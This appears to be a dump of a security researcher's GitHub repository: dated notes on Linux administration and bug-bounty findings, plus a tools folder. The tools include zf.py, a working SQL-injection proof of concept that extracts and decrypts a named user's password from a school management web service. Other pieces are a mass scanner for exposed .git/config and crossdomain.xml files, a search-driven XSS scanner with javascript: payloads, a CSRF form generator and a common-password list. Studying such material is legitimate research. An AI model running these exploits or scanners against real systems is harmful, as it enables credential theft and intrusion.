29 | /sbin/iptables -A INPUT -p udp --sport 53 -j ACCEPT # dns
30 | /sbin/iptables -A INPUT -p udp --sport 123 -j ACCEPT # ntp
31 | /sbin/iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT # ping
32 | /sbin/iptables -P INPUT DROP
33 |
34 | echo "setting up output chain"
35 | /sbin/iptables -A OUTPUT -o lo -j ACCEPT #allow local address
36 | /sbin/iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT # allow exist connection
37 | for i in "${whitelist[@]}"
38 | do
39 | /sbin/iptables -A OUTPUT -d $i -j ACCEPT
40 | done
41 | /sbin/iptables -A OUTPUT -p udp --dport 53 -j ACCEPT # dns
42 | /sbin/iptables -A OUTPUT -p udp --dport 123 -j ACCEPT # ntp
43 | /sbin/iptables -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT # ping
44 | /sbin/iptables -P OUTPUT DROP
45 |
46 | echo
47 | iptables -vnL
48 | ```
49 |
--------------------------------------------------------------------------------
/2016-11-18-supervisor常用操作.md:
--------------------------------------------------------------------------------
1 | ## Supervisor日常使用
2 |
3 | 1. 添加了配置文件,如何更新?
4 |
5 | ```bash
6 | $ sudo supervisorctl reread
7 | $ sudo supervisorctl update
8 | ```
9 |
10 | 2. 重启某个服务
11 |
12 | ```bash
13 | $ sudo supervisorctl restart xxxx
14 | ```
15 |
16 | 3. 重启所有程序
17 |
18 | ```bash
19 | $ sudo supervisorctl reload
20 | ```
21 |
22 | 4. 一个配置运行多个进程
23 |
24 | ```
25 | process_name = %(program_name)s_%(process_num)02d
26 | numprocs = 2
27 | ```
28 |
--------------------------------------------------------------------------------
/2017-03-22.md:
--------------------------------------------------------------------------------
1 | [Stealing Messenger.com Login Nonces](https://stephensclafani.com/2017/03/21/stealing-messenger-com-login-nonces/)
2 |
3 | 里面提到了一个工具:https://crt.sh/?q=%25.uber.com 好用啊!!
4 |
--------------------------------------------------------------------------------
/2017-03-23.md:
--------------------------------------------------------------------------------
1 | ## 查看端口所属进程
2 | > From http://weibo.com/1273725432/EB6yM6csO?type=comment
3 |
4 | 查看端口所属进程,过去用过lsof、netstat、fuser、pfiles,甚至还有mdb。最近看XorDDoS Trojan时,才知道有新的"ss -napt"可用。样本在对付ss,忍不住好奇看了一遍ss(8)。
5 |
6 | ## tcpdump获取数据包
7 |
8 | ```sh
9 | sudo tcpdump host 172.16.0.1 -i eth1 -w mycap.pcap
10 | ```
11 |
--------------------------------------------------------------------------------
/2017-03-24.md:
--------------------------------------------------------------------------------
1 | > From https://hackerone.com/reports/174474
2 |
3 | 能够从url hash里设置cookie也是神奇。。
4 | ```
5 | https://testerovusera.harvestapp.com/people/1412277/edit#NewGlobalCookieKey=NewGlobalCookieValue;path=/;/
6 | ```
7 |
8 | 
9 |
10 | > From http://agrrrdog.blogspot.ru/2017/03/autobinding-vulns-and-spring-mvc.html
11 |
12 | 学习到了一种新的漏洞类型:`Autobinding` or `Mass Assignment`
13 |
--------------------------------------------------------------------------------
/2017-03-30.md:
--------------------------------------------------------------------------------
1 | > From https://twitter.com/zseano/status/847295384430956544
2 |
3 | I've been having a lot of success lately bypassing open url redirect filters with this: `hxxps://lol.com\.theirsite.com/test (replace hxxps)`
4 |
--------------------------------------------------------------------------------
/2017-04-01.md:
--------------------------------------------------------------------------------
1 | ## Posting JSON with an HTML Form
2 | ```html
3 |
4 |
7 |
8 | ```
9 |
10 | This results in a request body of:
11 |
12 | ```json
13 | {"secret": 1337, "trash": "="}
14 | ```
15 |
--------------------------------------------------------------------------------
/2017-04-16.md:
--------------------------------------------------------------------------------
1 | > From https://hackerone.com/reports/88719
2 |
3 | It is dangerous to use jQuery's ajax function without specifying the expected data type. Attacker can supply a remote js file to achieve XSS. This can be addressed by specifying the data type to be JSON
4 |
5 | ```
6 | $.get('https://innerht.ml/vectors/js.php')
7 | ```
8 |
9 | https://innerht.ml/vectors/js.php
10 | ```
11 | access-control-allow-credentials:true
12 | access-control-allow-origin:https://jquery.com
13 |
14 | alert(document.domain);
15 | ```
16 |
--------------------------------------------------------------------------------
/2017-08-27-找出是谁登录了你的Gitlab服务器.md:
--------------------------------------------------------------------------------
1 | ## 找出是谁登录了你的Gitlab服务器
2 |
3 | > 尊敬的用户:您的服务器xxx.xxx.xxx.xxx 在XX市(`14.113.xxx.xxx`)处登录,很有可能已被黑客成功入侵,请立即进入云盾-服务器安全(安骑士)控制台,进行查看和处理,如果确认为您自己的操作,请忽略该消息,点击此处去查看
4 |
5 | #### 登录Gitlab服务器,查看`/var/log/auth.log`
6 |
7 | ```bash
8 | $ cat /var/log/auth.log | grep "14.113.xxx.xxx"
9 | Aug 27 21:40:37 gitlab sshd[17276]: Received disconnect from 14.113.xxx.xxx: 11: Closed due to user request. [preauth]
10 | Aug 27 21:40:46 gitlab sshd[17299]: Accepted publickey for git from 14.113.xxx.xxx port 13370 ssh2: RSA a2:45:b8:33:8c:a9:6d:37:63:b3:06:0e:xx:xx:xx:xx
11 | Aug 27 21:41:03 gitlab sshd[17320]: Received disconnect from 14.113.xxx.xxx: 11: Closed due to user request.
12 | Aug 27 21:41:42 gitlab sshd[17435]: Accepted publickey for git from 14.113.xxx.xxx port 14544 ssh2: RSA a2:45:b8:33:8c:a9:6d:37:63:b3:06:0e:xx:xx:xx:xx
13 | Aug 27 21:41:42 gitlab sshd[17462]: Received disconnect from 14.113.xxx.xxx: 11: Closed due to user request.
14 | ```
15 |
16 | 得到异常登录用户的公钥指纹:a2:45:b8:33:8c:a9:6d:37:63:b3:06:0e:xx:xx:xx:xx
17 |
18 | #### 找出Gitlab所有用户列表
19 |
20 | Gitlab提供的API:https://docs.gitlab.com/ce/api/users.html#for-admins
21 |
22 | 我直接在浏览器里访问:`/api/v4/users?per_page=100`,保存成`users.json`文件
23 |
24 | #### python脚本
25 |
26 | ```python
27 | import base64
28 | import hashlib
29 | import json
30 | import requests
31 |
32 |
33 | # https://stackoverflow.com/a/6682934
34 | def lineToFingerprint(line):
35 | key = base64.b64decode(line.strip().split()[1].encode('ascii'))
36 | fp_plain = hashlib.md5(key).hexdigest()
37 | return ':'.join(a+b for a,b in zip(fp_plain[::2], fp_plain[1::2]))
38 |
39 |
40 | with open('users.json') as f:
41 | for u in json.load(f):
42 | r = requests.get('https://YOUR_GITLAB_HOST/' + u['username'] + '.keys')
43 | for l in r.text.splitlines():
44 | if not l.startswith('ssh-rsa'):
45 | continue
46 |
47 | fingerprint = lineToFingerprint(l)
48 | if fingerprint == 'a2:45:b8:33:8c:a9:6d:37:63:b3:06:0e:xx:xx:xx:xx':
49 | print u['username'] + ' ' + fingerprint
50 | ```
51 |
52 | 得到所有用户`ssh keys`公钥的指纹,对比后即可。
53 |
54 | #### 其他
55 |
56 | ```bash
57 | $ ssh-keygen -E md5 -lf ~/.ssh/id_rsa.pub
58 | 4096 MD5:81:d8:4d:ea:10:22:ce:d6:d5:5a:6d:4c:c5:21:b8:d5 test@test (RSA)
59 | ```
60 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ## XXXX
2 |
3 | 你知道我在干嘛吗?
4 |
5 | ### Tools
6 | * [批量下载crossdomain.xml的脚本](tools/hunt.py)
7 | * [从Burp Suite生成的请求文件生成CSRF表单](tools/generate_csrf_form.py)
8 | * [Google搜索找URL跳转XSS](tools/xss_via_redirect.py)
9 |
10 | ```bash
11 | $ python xss_via_redirect.py edu.cn
12 | [INFO] Searching links
13 | [INFO] Finding XSS ...
14 | [Potential XSS vulnerability] http://xxxx.xxx.edu.cn/go.asp?url=java%5Cu0073cript%5Cu003a%5Cu0061lert%281%29%3B
15 | ```
16 |
17 | ### Leagal Disclaimer
18 |
19 | Usage of my scripts for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
20 |
--------------------------------------------------------------------------------
/addthis_poc/poc.html:
--------------------------------------------------------------------------------
1 |
2 |
3 | Click anywhere :)
4 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/images/20150916232022.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zhchbin/xxxx/08a3980e58a8cd35df804ace51bb087b32292360/images/20150916232022.png
--------------------------------------------------------------------------------
/tools/crxmake.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # Cribbed from http://github.com/Constellation/crxmake/blob/master/lib/crxmake.rb
3 | # and http://src.chromium.org/viewvc/chrome/trunk/src/chrome/tools/extensions/chromium_extension.py?revision=14872&content-type=text/plain&pathrev=14872
4 |
5 | import sys
6 | from array import *
7 | from subprocess import *
8 |
9 | arg0,input,key,output = sys.argv
10 |
11 | # Sign the zip file with the private key in PEM format
12 | signature = Popen(["openssl", "sha1", "-sign", key, input], stdout=PIPE).stdout.read();
13 |
14 | # Convert the PEM key to DER (and extract the public form) for inclusion in the CRX header
15 | derkey = Popen(["openssl", "rsa", "-pubout", "-inform", "PEM", "-outform", "DER", "-in", key], stdout=PIPE).stdout.read();
16 |
17 | out=open(output, "wb");
18 | out.write("Cr24") # Extension file magic number
19 | header = array("l");
20 | header.append(2); # Version 2
21 | header.append(len(derkey));
22 | header.append(len(signature));
23 | header.tofile(out);
24 | out.write(derkey)
25 | out.write(signature)
26 | zip_data = open(input, 'rb').read()
27 | out.write(zip_data)
28 | out.close()
29 |
30 | print "Done."
31 |
--------------------------------------------------------------------------------
/tools/generate_csrf_form.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | import sys
5 | import argparse
6 | import base64
7 | from urlparse import parse_qsl
8 | from xml.dom import minidom
9 |
10 |
11 | def decode_form_urlencoded_values(request_body, encoding='utf-8'):
12 | for pair in parse_qsl(request_body, keep_blank_values=True):
13 | yield tuple(i.decode(encoding) for i in pair)
14 |
15 |
16 | def format_input(name, value):
17 | return '' % (name, value)
18 |
19 |
20 | def generate(index, item):
21 | url = item.getElementsByTagName('url')[0].firstChild.wholeText
22 | method = item.getElementsByTagName('method')[0].firstChild.wholeText
23 | if method.lower() != 'post':
24 | print "Only post request supported."
25 | return
26 |
27 | request = item.getElementsByTagName('request')[0]
28 | content = request.firstChild.wholeText
29 | base64_attr = request.attributes['base64']
30 | if base64_attr is not None and base64_attr.value == 'true':
31 | content = base64.b64decode(content)
32 | _, body = content.split("\r\n\r\n", 1)
33 |
34 | form = ''''''
38 |
39 | inputs = '\n'.join([format_input(name, value) for name, value in
40 | decode_form_urlencoded_values(body)])
41 | html = form % (url, inputs)
42 | output_file = 'csrf_' + str(index) + '.html'
43 | with open(output_file, 'wb') as f:
44 | f.write(html.encode('utf-8'))
45 |
46 |
47 | def main(argv):
48 | parser = argparse.ArgumentParser()
49 | parser.add_argument('-i', '--input', type=str, required=True,
50 | help='The burp history xml file.')
51 | args = vars(parser.parse_args(argv))
52 | input_file = args['input']
53 | xml_doc = minidom.parse(input_file)
54 | item_list = xml_doc.getElementsByTagName('item')
55 | [generate(index, item) for index, item in enumerate(item_list)]
56 |
57 |
58 | if __name__ == '__main__':
59 | main(sys.argv[1:])
60 |
--------------------------------------------------------------------------------
/tools/hunt.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | import argparse
5 | import requests
6 | import sys
7 |
8 | from multicpu import multi_cpu
9 |
10 |
11 | def read_file(input_file):
12 | with open(input_file) as f:
13 | domain_list = f.readlines()
14 | result = []
15 | for domain in domain_list:
16 | domain = domain.strip('\n').strip('\/')
17 | if (not domain.startswith('http://') and
18 | not domain.startswith('https://')):
19 | domain = 'http://' + domain
20 | result.append(domain)
21 | return result
22 |
23 |
24 | def hunt(domain):
25 | url = domain + '/crossdomain.xml'
26 | headers = {
27 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36', # nopep8
28 | }
29 | result = {'domain': domain}
30 | try:
31 | res = requests.get(url, headers=headers, allow_redirects=False)
32 | if res.status_code / 100 == 2:
33 | result['crossdomain'] = res.text
34 | if 'domain="*"' in result['crossdomain']:
35 | result['crossdomain_allow_any'] = True
36 | except:
37 | pass
38 |
39 | url = domain + '/.git/config'
40 | try:
41 | res = requests.get(url, headers=headers, allow_redirects=False)
42 | result['git_hack'] = (res.status_code / 100 == 2)
43 | except:
44 | pass
45 |
46 | return result
47 |
48 |
49 | def main(argv):
50 | parser = argparse.ArgumentParser()
51 | parser.add_argument('-i', '--input', type=str, required=True,
52 | help='The input file consists of domains.')
53 | parser.add_argument('-c', '--cpu_num', type=int)
54 | parser.add_argument('-t', '--thread_num', type=int)
55 | args = vars(parser.parse_args(argv))
56 | input_file = args['input']
57 | domain_list = read_file(input_file)
58 | cpu_num = 2 if args['cpu_num'] is None else args['cpu_num']
59 | thread_num = 4 if args['thread_num'] is None else args['thread_num']
60 | result = multi_cpu(hunt, domain_list, cpu_num, thread_num)
61 | # TODO: output the result
62 |
63 |
64 | if __name__ == '__main__':
65 | main(sys.argv[1:])
66 |
--------------------------------------------------------------------------------
/tools/requirements.txt:
--------------------------------------------------------------------------------
1 | futures
2 | multicpu
3 |
--------------------------------------------------------------------------------
/tools/top_100_pass.txt:
--------------------------------------------------------------------------------
1 | 123456
2 | a123456
3 | 123456a
4 | 5201314
5 | 111111
6 | woaini1314
7 | qq123456
8 | 123123
9 | 000000
10 | 1qaz2wsx
11 | 1q2w3e4r
12 | qwe123
13 | 7758521
14 | 123qwe
15 | a123123
16 | 123456aa
17 | woaini520
18 | woaini
19 | 100200
20 | 1314520
21 | woaini123
22 | 123321
23 | q123456
24 | 123456789
25 | 123456789a
26 | 5211314
27 | asd123
28 | a123456789
29 | z123456
30 | asd123456
31 | a5201314
32 | aa123456
33 | zhang123
34 | aptx4869
35 | 123123a
36 | 1q2w3e4r5t
37 | 1qazxsw2
38 | 5201314a
39 | 1q2w3e
40 | aini1314
41 | 31415926
42 | q1w2e3r4
43 | 123456qq
44 | woaini521
45 | 1234qwer
46 | a111111
47 | 520520
48 | iloveyou
49 | abc123
50 | 110110
51 | 111111a
52 | 123456abc
53 | w123456
54 | 7758258
55 | 123qweasd
56 | 159753
57 | qwer1234
58 | a000000
59 | qq123123
60 | zxc123
61 | 123654
62 | abc123456
63 | 123456q
64 | qq5201314
65 | 12345678
66 | 000000a
67 | 456852
68 | as123456
69 | 1314521
70 | 112233
71 | 521521
72 | qazwsx123
73 | zxc123456
74 | abcd1234
75 | asdasd
76 | 666666
77 | love1314
78 | QAZ123
79 | aaa123
80 | q1w2e3
81 | aaaaaa
82 | a123321
83 | 123000
84 | 11111111
85 | 12qwaszx
86 | 5845201314
87 | s123456
88 | nihao123
89 | caonima123
90 | zxcvbnm123
91 | wang123
92 | 159357
93 | 1A2B3C4D
94 | asdasd123
95 | 584520
96 | 753951
97 | 147258
98 | 1123581321
99 | 110120
100 | qq1314520
101 |
--------------------------------------------------------------------------------
/tools/xss_via_redirect.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | import sys
5 | import requests
6 |
7 | from googleapiclient.discovery import build
8 | from urlparse import urlparse, parse_qs
9 | from urllib import urlencode
10 |
11 |
12 | PAGE_SIZE = 10
13 |
14 | # https://console.developers.google.com/apis/api/customsearch/overview
15 | # 新建一个项目,然后获取其配置KEY,一个KEY每天免费搜索100次
16 | DEVELOPER_KEY = ''
17 |
18 | # https://cse.google.com/cse/all
19 | # 添加一个搜索引擎,要搜索的网站设为整个网络,搜索引擎ID
20 | CUSTOM_SEARCH_ENGINE = ''
21 |
22 | session = requests.Session()
23 | session.trust_env = False
24 |
25 |
26 | def search_links(site, keyword, link_dict):
27 | service = build("customsearch", "v1", developerKey=DEVELOPER_KEY)
28 | cse = service.cse()
29 | query = 'site:%s inurl:%s=http' % (site, keyword)
30 | start = 1
31 | for i in range(10):
32 | res = service.cse().list(
33 | q=query,
34 | start=start,
35 | num=PAGE_SIZE,
36 | cx=CUSTOM_SEARCH_ENGINE).execute()
37 | if 'items' not in res:
38 | break
39 |
40 | for item in res['items']:
41 | link = urlparse(item['link'])
42 | key = link.netloc + link.path
43 | if key not in link_dict:
44 | link_dict[key] = link
45 | start += PAGE_SIZE
46 |
47 |
48 | def verify(link, keywords):
49 | payload = 'java\\u0073cript\\u003a\\u0061lert(1);'
50 | query = parse_qs(link.query)
51 | for k in keywords:
52 | if k not in query:
53 | continue
54 | query[k] = payload
55 | headers = {
56 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'
57 | }
58 | l = link._replace(query=urlencode(query))
59 | try:
60 | res = session.get(l.geturl(), headers=headers)
61 | if res.status_code / 100 != 2:
62 | continue
63 | if payload in res.text:
64 | print "[Potential XSS vulnerability] " + l.geturl()
65 | except:
66 | print '[ERROR] requesting: ' + l.geturl()
67 | continue
68 |
69 |
70 | def main(site):
71 | print '[INFO] Searching links'
72 | links = {}
73 | keywords = ['url', 'target', 'u']
74 | for k in keywords:
75 | search_links(site, k, links)
76 | # print links
77 |
78 | print '[INFO] Finding XSS ...'
79 | for k, v in links.items():
80 | verify(v, keywords)
81 |
82 |
83 | if __name__ == '__main__':
84 | main(sys.argv[1])
85 |
--------------------------------------------------------------------------------
/tools/zf.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | zf.py
4 | ~~~~~~~~~
5 | POC of http://wooyun.org/bugs/wooyun-2015-0122523
6 |
7 | Author: Chaobin Zhang
8 |
9 | Legal Disclaimer: Usage of this script for attacking targets without prior
10 | mutual consent is illegal. It is the end user's responsibility to obey all
11 | applicable local, state and federal laws. Developers assume no liability
12 | and are not responsible for any misuse or damage caused by this program.
13 | """
14 |
15 | import argparse
16 | import base64
17 | import re
18 | import requests
19 | import sys
20 |
21 | KEYS = ['Encrypt01', 'Acxylf365jw']
22 |
23 |
24 | def decode(value, key):
25 | length_of_value = len(value)
26 | if length_of_value % 2 == 0:
27 | mid = length_of_value / 2
28 | # Split value in the middle -> reverse -> concatenate
29 | value = value[:mid][::-1] + value[mid:][::-1]
30 | k = 0
31 | result = ''
32 | for v in value:
33 | c = ord(v)
34 | bl_1 = 1 if c ^ ord(key[k]) < 32 else 0
35 | bl_2 = 1 if c ^ ord(key[k]) > 126 else 0
36 | bl_3 = (1 if c < 0 else 0) | (bl_1 | bl_2)
37 | bl_4 = (1 if c > 255 else 0) | bl_3
38 | if bl_4:
39 | result += v
40 | else:
41 | result += chr(c ^ ord(key[k]))
42 | k = 0 if k + 1 == len(key) else k + 1
43 | return result
44 |
45 |
46 | def get_password(target, user):
47 | data = """
48 |
49 |
50 |
51 | 222222' union select Null,kl,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null from yhb where yhm='%s
52 | 2013-2014-1
53 | KKKGZ2312
54 |
55 |
56 | """ % (user)
57 | headers = {
58 | 'Content-Type': 'text/xml; charset=utf-8',
59 | 'SOAPAction': '\"http://www.zf_webservice.com/GetStuCheckinInfo \"'
60 | }
61 | res = requests.post(target + '/service.asmx', headers=headers, data=data)
62 | password = re.findall('(.+?)',
63 | res.text, re.S)
64 | if len(password) != 1:
65 | print '[ERROR] Can not retrive %s\'s password' % (user)
66 | sys.exit(-1)
67 | password = password[0]
68 | print '[-] The encrypted password of %s is: %s' % (user, password)
69 | MD5_HEAD = '{MD5}'
70 | if password.startswith(MD5_HEAD):
71 | print '[-] Password in MD5 form: %s' % (
72 | base64.b64decode(password[len(MD5_HEAD):]).encode('hex'))
73 | else:
74 | yes = raw_input(
75 | '[*] Do you want to decrypt the password using the default keys? ')
76 | if yes == 'y' or yes == 'yes':
77 | for k in KEYS:
78 | print '[-] Key ' + k + ': ' + decode(password, k)
79 |
80 |
81 | def main(argv):
82 | parser = argparse.ArgumentParser()
83 | parser.add_argument('-t', '--target', type=str,
84 | help='The target address you want to test.')
85 | parser.add_argument('-u', '--user', type=str,
86 | help='The user you want to get password from.')
87 | args = vars(parser.parse_args(argv))
88 | if args['user'] is None:
89 | args['user'] = 'jwc01'
90 | target = args['target']
91 | if target is None:
92 | target = raw_input(
93 | '[*] Please input your target, like "http://xx.edu.cn": ')
94 | HTTP = 'http://'
95 | if not target.startswith(HTTP):
96 | target = HTTP + target
97 |
98 | get_password(target, args['user'])
99 |
100 |
101 | if __name__ == '__main__':
102 | main(sys.argv[1:])
103 |
--------------------------------------------------------------------------------